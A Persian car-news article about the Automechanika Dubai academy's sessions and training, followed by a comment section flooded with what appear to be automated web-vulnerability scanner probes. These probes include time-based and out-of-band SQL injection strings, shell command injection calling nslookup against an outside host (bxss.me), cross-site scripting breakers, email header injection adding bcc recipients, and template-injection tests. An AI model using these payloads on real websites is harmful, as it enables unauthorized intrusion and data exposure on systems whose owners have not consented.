• 09 اردیبهشت 1397
  • 20:12
  • شناسه خبر: 18663

هرآنچه از آکادمی اتومکانیکای دوبی باید بدانید

هرآنچه از آکادمی اتومکانیکای دوبی باید بدانید

 آکادمی اتومکانیکای دوبی بستری برای گردهمایی متخصصان و فعالان صنعت خودرو برای تبادل اطلاعات در خصوص آخرین دستاوردها، جدیدترین نوآوری ها و تغییرات بخش خودرو فراهم می کند.

 این آکادمی در بخش نوآوری که در سالن 4 برگزار می شود توانمندی هایی را که باعث رشد صنعت خودرو خاورمیانه و آفریقا در آینده ای نزدیک می شود را به نمایش می گذارد.
در بخش دیگری از این آکادمی، اتومکانیکای دوبی با همکاری IMI، شریک رسمی این نمایشگاه در مبحث تعمیرات و نگهداری، آموزش های رایگانی را در خصوص این مبحث در اختیار علاقمندان قرار می دهد. این مباحث آموزشی از ساعت 11 تا 1 روز دوازدهم اردیبهشت ماه برگزار می شود.
سیزدهم اردیبهشت ماه نیز طی برنامه ای راه های ارتباطی خریداران آفریقایی و فروشندگان جهانی بررسی می شود. این ملاقات از ساعت 16 الی 18 روز سوم نمایشگاه برپا خواهد شد.
خودروهای تجاری هوشمند در خاورمیانه از دیگر مباحثی است که طی روزهای دوازدهم و سیزدهم اردیبهشت ماه در محل برگزاری اتومکانیکای دوبی به آن پرداخته می شود.
علاقمندان به شرکت در این مباحث می توانند برای کسب اطلاعات بیشتر به وب سایت اتومکانیکای دوبی (اینجا) مراجعه کنند.

منبع : عصر خودرو

ارسال نظرات

نام

ایمیل

وب سایت

نظرات شما

xrygdqfl یکشنبه, 11 شهریور,1397 10:53
1
jhhjbaba یکشنبه, 11 شهریور,1397 10:55
1
mwbwmews یکشنبه, 11 شهریور,1397 10:57
1
leksufpc یکشنبه, 11 شهریور,1397 11:03
1
leksufpc یکشنبه, 11 شهریور,1397 11:03
1
cwwrbdrn یکشنبه, 11 شهریور,1397 11:36
1
xyvsingk یکشنبه, 11 شهریور,1397 11:36
1
pkcgonet یکشنبه, 11 شهریور,1397 11:36
1
gmeiwcnr یکشنبه, 11 شهریور,1397 11:39
1
vutcxprp یکشنبه, 11 شهریور,1397 11:39
1
leksufpc یکشنبه, 11 شهریور,1397 12:15
1
arlsbahd یکشنبه, 11 شهریور,1397 12:16
1
arlsbahd یکشنبه, 11 شهریور,1397 12:17
1
smieyixa یکشنبه, 11 شهریور,1397 12:20
1
smieyixa یکشنبه, 11 شهریور,1397 12:21
1
smieyixa یکشنبه, 11 شهریور,1397 12:22
1
arlsbahd یکشنبه, 11 شهریور,1397 18:42
1
arlsbahd یکشنبه, 11 شهریور,1397 18:42
1
arlsbahd یکشنبه, 11 شهریور,1397 18:45
1
arlsbahd یکشنبه, 11 شهریور,1397 18:47
1
arlsbahd یکشنبه, 11 شهریور,1397 18:47
1
arlsbahd یکشنبه, 11 شهریور,1397 18:47
1
arlsbahd یکشنبه, 11 شهریور,1397 18:47
1
arlsbahd یکشنبه, 11 شهریور,1397 18:48
1
arlsbahd یکشنبه, 11 شهریور,1397 18:49
1
arlsbahd یکشنبه, 11 شهریور,1397 18:50
1
arlsbahd یکشنبه, 11 شهریور,1397 18:50
1
arlsbahd یکشنبه, 11 شهریور,1397 18:50
1
arlsbahd یکشنبه, 11 شهریور,1397 18:51
1
arlsbahd یکشنبه, 11 شهریور,1397 18:52
1
arlsbahd یکشنبه, 11 شهریور,1397 18:52
1
arlsbahd یکشنبه, 11 شهریور,1397 18:53
1
arlsbahd یکشنبه, 11 شهریور,1397 18:54
1
arlsbahd یکشنبه, 11 شهریور,1397 18:55
1
arlsbahd یکشنبه, 11 شهریور,1397 18:56
1
arlsbahd یکشنبه, 11 شهریور,1397 18:57
1
arlsbahd یکشنبه, 11 شهریور,1397 18:58
1
arlsbahd یکشنبه, 11 شهریور,1397 18:58
1
arlsbahd یکشنبه, 11 شهریور,1397 18:58
1
arlsbahd یکشنبه, 11 شهریور,1397 18:59
1
arlsbahd یکشنبه, 11 شهریور,1397 18:59
1
smieyixa یکشنبه, 11 شهریور,1397 19:00
1
smieyixa یکشنبه, 11 شهریور,1397 19:00
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:02
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:03
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:03
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:04
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:04
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:04
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:05
1
mxctrqbp یکشنبه, 11 شهریور,1397 19:05
1
smieyixa یکشنبه, 11 شهریور,1397 19:06
1
smieyixa یکشنبه, 11 شهریور,1397 19:06
1
yqjgqjwc ﺳﻪشنبه, 13 شهریور,1397 01:01
1
woyesnio ﺳﻪشنبه, 13 شهریور,1397 01:03
1
avhaljcl چهارشنبه, 14 شهریور,1397 02:33
1
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
R4AKugRv
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1 OR 2+489-489-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1 OR 2+78-78-1=0+0+0+1
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1' OR 2+248-248-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1' OR 2+261-261-1=0+0+0+1 or '4r3LRosS'='
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1" OR 2+917-917-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1; waitfor delay '0:0:3' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1); waitfor delay '0:0:3' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1 waitfor delay '0:0:3' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
4WduQhM0'; waitfor delay '0:0:3' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1;select pg_sleep(6); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1);select pg_sleep(6); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1));select pg_sleep(6); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
0orZ1OBb';select pg_sleep(6); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
Wl0G1Uer');select pg_sleep(6); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
j0xfYBXa'));select pg_sleep(6); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17931.111.22635.1.bxss'||'.me')
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
'||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17932.111.22635.1.bxss'||'.me')||'
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1;copy (select '') to program 'nslookup dns.sqli.\047511.111-17933.111.22635.\1.bxss.me'
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1';copy (select '') to program 'nslookup dns.sqli.\047511.111-17934.111.22635.\1.bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
429'
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
i6P3Mbp4
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1 OR 2+481-481-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1 OR 2+406-406-1=0+0+0+1
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1' OR 2+427-427-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1' OR 2+538-538-1=0+0+0+1 or 'dtKAoeUT'='
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1" OR 2+77-77-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1; waitfor delay '0:0:12' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1); waitfor delay '0:0:12' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1 waitfor delay '0:0:12' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
LNVXWWpF'; waitfor delay '0:0:12' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1;select pg_sleep(4); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1);select pg_sleep(4); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1));select pg_sleep(4); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
A4SZT13Q';select pg_sleep(4); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
egCtj39e');select pg_sleep(4); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
XaEh2B4w'));select pg_sleep(4); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17935.111.22635.1.bxss'||'.me')
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
'||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17936.111.22635.1.bxss'||'.me')||'
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1;copy (select '') to program 'nslookup dns.sqli.\047511.111-17937.111.22635.\1.bxss.me'
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
1';copy (select '') to program 'nslookup dns.sqli.\047511.111-17938.111.22635.\1.bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
852'
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
8D3vSWuD
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1 OR 2+664-664-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1 OR 2+304-304-1=0+0+0+1
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1' OR 2+153-153-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:34
-1' OR 2+720-720-1=0+0+0+1 or 'G8VBPMjy'='
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1" OR 2+160-160-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1; waitfor delay '0:0:10' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1); waitfor delay '0:0:10' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1 waitfor delay '0:0:10' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
nGWpfDnx'; waitfor delay '0:0:10' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1;select pg_sleep(15); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1);select pg_sleep(15); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1));select pg_sleep(15); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
UrArr8Xs';select pg_sleep(15); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
bdijJ1Rx');select pg_sleep(15); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
TaJbmBHQ'));select pg_sleep(15); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17939.111.22635.1.bxss'||'.me')
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
'||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17940.111.22635.1.bxss'||'.me')||'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1;copy (select '') to program 'nslookup dns.sqli.\047511.111-17941.111.22635.\1.bxss.me'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1';copy (select '') to program 'nslookup dns.sqli.\047511.111-17942.111.22635.\1.bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
505'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
HnJc4rxi
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+377-377-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+859-859-1=0+0+0+1
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+202-202-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+780-780-1=0+0+0+1 or 'wG4tvACq'='
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1" OR 2+676-676-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1; waitfor delay '0:0:6' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1); waitfor delay '0:0:6' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1 waitfor delay '0:0:6' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
4FukKlhE'; waitfor delay '0:0:6' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1;select pg_sleep(12); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1);select pg_sleep(12); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1));select pg_sleep(12); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
5aAFYJ2X';select pg_sleep(12); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
JAS1XPer');select pg_sleep(12); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
7baOjJvq'));select pg_sleep(12); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17945.111.22635.1.bxss'||'.me')
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
'||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17946.111.22635.1.bxss'||'.me')||'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1;copy (select '') to program 'nslookup dns.sqli.\047511.111-17947.111.22635.\1.bxss.me'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1';copy (select '') to program 'nslookup dns.sqli.\047511.111-17948.111.22635.\1.bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
77'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
6z6BCudU
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+139-139-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+272-272-1=0+0+0+1
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+231-231-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+276-276-1=0+0+0+1 or 'rLQ56Z3K'='
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1" OR 2+270-270-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
if(now()=sysdate(),sleep(21),0)/*'XOR(if(now()=sysdate(),sleep(21),0))OR'"XOR(if(now()=sysdate(),sleep(21),0))OR"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
(select(0)from(select(sleep(21)))v)/*'+(select(0)from(select(sleep(21)))v)+'"+(select(0)from(select(sleep(21)))v)+"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1; waitfor delay '0:0:21' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1); waitfor delay '0:0:7' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1 waitfor delay '0:0:7' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
olmhlywD'; waitfor delay '0:0:7' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1;select pg_sleep(7); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1);select pg_sleep(7); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1));select pg_sleep(7); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
7VV6nbO3';select pg_sleep(14); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
4GBXmMaJ');select pg_sleep(14); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
xoREZ92W'));select pg_sleep(14); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17949.111.22635.1.bxss'||'.me')
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
'||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17950.111.22635.1.bxss'||'.me')||'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1;copy (select '') to program 'nslookup dns.sqli.\047511.111-17951.111.22635.\1.bxss.me'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1';copy (select '') to program 'nslookup dns.sqli.\047511.111-17952.111.22635.\1.bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
411'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
spIMIbXg
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+906-906-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+347-347-1=0+0+0+1
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+736-736-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+496-496-1=0+0+0+1 or 'HW42jITu'='
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1" OR 2+509-509-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
if(now()=sysdate(),sleep(16),0)/*'XOR(if(now()=sysdate(),sleep(16),0))OR'"XOR(if(now()=sysdate(),sleep(16),0))OR"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
(select(0)from(select(sleep(16)))v)/*'+(select(0)from(select(sleep(16)))v)+'"+(select(0)from(select(sleep(16)))v)+"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1; waitfor delay '0:0:16' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1); waitfor delay '0:0:24' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1 waitfor delay '0:0:24' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
Nk8C6KM2'; waitfor delay '0:0:24' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1;select pg_sleep(24); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1);select pg_sleep(24); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1));select pg_sleep(24); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
IUAtMzg1';select pg_sleep(8); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
FygYwlN1');select pg_sleep(8); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
Mhnfs0hw'));select pg_sleep(8); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17953.111.22635.1.bxss'||'.me')
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
'||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17954.111.22635.1.bxss'||'.me')||'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1;copy (select '') to program 'nslookup dns.sqli.\047511.111-17955.111.22635.\1.bxss.me'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1';copy (select '') to program 'nslookup dns.sqli.\047511.111-17956.111.22635.\1.bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
483'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
wE0Ev1EY
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+71-71-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1 OR 2+209-209-1=0+0+0+1
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+818-818-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1' OR 2+461-461-1=0+0+0+1 or 'XbzQmZ35'='
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1" OR 2+747-747-1=0+0+0+1 --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1; waitfor delay '0:0:9' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1); waitfor delay '0:0:18' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1 waitfor delay '0:0:18' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
D8FR40oE'; waitfor delay '0:0:18' --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1;select pg_sleep(18); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1);select pg_sleep(18); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
-1));select pg_sleep(18); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
2v9DdR6I';select pg_sleep(27); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
2QGJK0Yj');select pg_sleep(27); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
2GVzWjK5'));select pg_sleep(27); --
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17957.111.22635.1.bxss'||'.me')
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
'||UTL_INADDR.get_host_address('dns.'||'sqli.047511.111-17958.111.22635.1.bxss'||'.me')||'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1;copy (select '') to program 'nslookup dns.sqli.\047511.111-17959.111.22635.\1.bxss.me'
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
1';copy (select '') to program 'nslookup dns.sqli.\047511.111-17960.111.22635.\1.bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:35
886'
avhaljcl چهارشنبه, 14 شهریور,1397 02:36
1
avhaljcl چهارشنبه, 14 شهریور,1397 02:38
1
avhaljcl چهارشنبه, 14 شهریور,1397 02:39
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1'>">
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1
avhaljcl چهارشنبه, 14 شهریور,1397 02:40
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1'>">
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1'>">
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1'>">
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1'>">
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1'>">
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1
mcksaoth چهارشنبه, 14 شهریور,1397 02:40
1'>">
qlejejav چهارشنبه, 14 شهریور,1397 02:41
1
okgqdocb چهارشنبه, 14 شهریور,1397 02:41
YVVpVxgG
qlejejav چهارشنبه, 14 شهریور,1397 02:41
set|set&set
okgqdocb چهارشنبه, 14 شهریور,1397 02:41
Mp1Ss09c
okgqdocb چهارشنبه, 14 شهریور,1397 02:41
vS5cX1Gz
qlejejav چهارشنبه, 14 شهریور,1397 02:41
$(nslookup dns.ce.\047511.111-18193.111.22635.\1.bxss.me)
okgqdocb چهارشنبه, 14 شهریور,1397 02:41
17wZMOMX
qlejejav چهارشنبه, 14 شهریور,1397 02:41
&nslookup dns.ce.\047511.111-18194.111.22635.\1.bxss.me&'\"`0&nslookup dns.ce.\047511.111-18194.111.22635.\1.bxss.me&`'
okgqdocb چهارشنبه, 14 شهریور,1397 02:41
YJoMWrHS
qlejejav چهارشنبه, 14 شهریور,1397 02:41
$(nslookup dns.ce.\047511.111-18197.111.22635.\1.bxss.me)
okgqdocb چهارشنبه, 14 شهریور,1397 02:41
wmbzQqaF
qlejejav چهارشنبه, 14 شهریور,1397 02:41
&nslookup dns.ce.\047511.111-18198.111.22635.\1.bxss.me&'\"`0&nslookup dns.ce.\047511.111-18198.111.22635.\1.bxss.me&`'
okgqdocb چهارشنبه, 14 شهریور,1397 02:41
XEVqEjHn
qlejejav چهارشنبه, 14 شهریور,1397 02:41
$(nslookup dns.ce.\047511.111-18199.111.22635.\1.bxss.me)
qlejejav چهارشنبه, 14 شهریور,1397 02:41
&nslookup dns.ce.\047511.111-18200.111.22635.\1.bxss.me&'\"`0&nslookup dns.ce.\047511.111-18200.111.22635.\1.bxss.me&`'
qlejejav چهارشنبه, 14 شهریور,1397 02:41
$(nslookup dns.ce.\047511.111-18201.111.22635.\1.bxss.me)
qlejejav چهارشنبه, 14 شهریور,1397 02:41
&nslookup dns.ce.\047511.111-18202.111.22635.\1.bxss.me&'\"`0&nslookup dns.ce.\047511.111-18202.111.22635.\1.bxss.me&`'
qlejejav چهارشنبه, 14 شهریور,1397 02:41
$(nslookup dns.ce.\047511.111-18203.111.22635.\1.bxss.me)
qlejejav چهارشنبه, 14 شهریور,1397 02:41
&nslookup dns.ce.\047511.111-18204.111.22635.\1.bxss.me&'\"`0&nslookup dns.ce.\047511.111-18204.111.22635.\1.bxss.me&`'
qlejejav چهارشنبه, 14 شهریور,1397 02:41
$(nslookup dns.ce.\047511.111-18205.111.22635.\1.bxss.me)
qlejejav چهارشنبه, 14 شهریور,1397 02:41
&nslookup dns.ce.\047511.111-18206.111.22635.\1.bxss.me&'\"`0&nslookup dns.ce.\047511.111-18206.111.22635.\1.bxss.me&`'
qlejejav چهارشنبه, 14 شهریور,1397 02:41
$(nslookup dns.ce.\047511.111-18207.111.22635.\1.bxss.me)
qlejejav چهارشنبه, 14 شهریور,1397 02:41
&nslookup dns.ce.\047511.111-18208.111.22635.\1.bxss.me&'\"`0&nslookup dns.ce.\047511.111-18208.111.22635.\1.bxss.me&`'
avhaljcl چهارشنبه, 14 شهریور,1397 02:42
1
dcfntkhu چهارشنبه, 14 شهریور,1397 02:42
1%0abcc:047511.111-18361.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:42
to@example.com>%0d%0abcc:047511.111-18362.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:42
1%0abcc:047511.111-18365.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:42
to@example.com>%0d%0abcc:047511.111-18366.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:42
1%0abcc:047511.111-18367.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:42
to@example.com>%0d%0abcc:047511.111-18368.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:42
1%0abcc:047511.111-18369.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:43
to@example.com>%0d%0abcc:047511.111-18370.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:43
1%0abcc:047511.111-18371.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:43
to@example.com>%0d%0abcc:047511.111-18372.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:43
1%0abcc:047511.111-18373.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:43
to@example.com>%0d%0abcc:047511.111-18374.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:43
1%0abcc:047511.111-18375.111.22635.1@bxss.me
dcfntkhu چهارشنبه, 14 شهریور,1397 02:43
to@example.com>%0d%0abcc:047511.111-18376.111.22635.1@bxss.me
avhaljcl چهارشنبه, 14 شهریور,1397 02:43
1
djcldynl چهارشنبه, 14 شهریور,1397 02:43
${9999451+9999147}
djcldynl چهارشنبه, 14 شهریور,1397 02:43
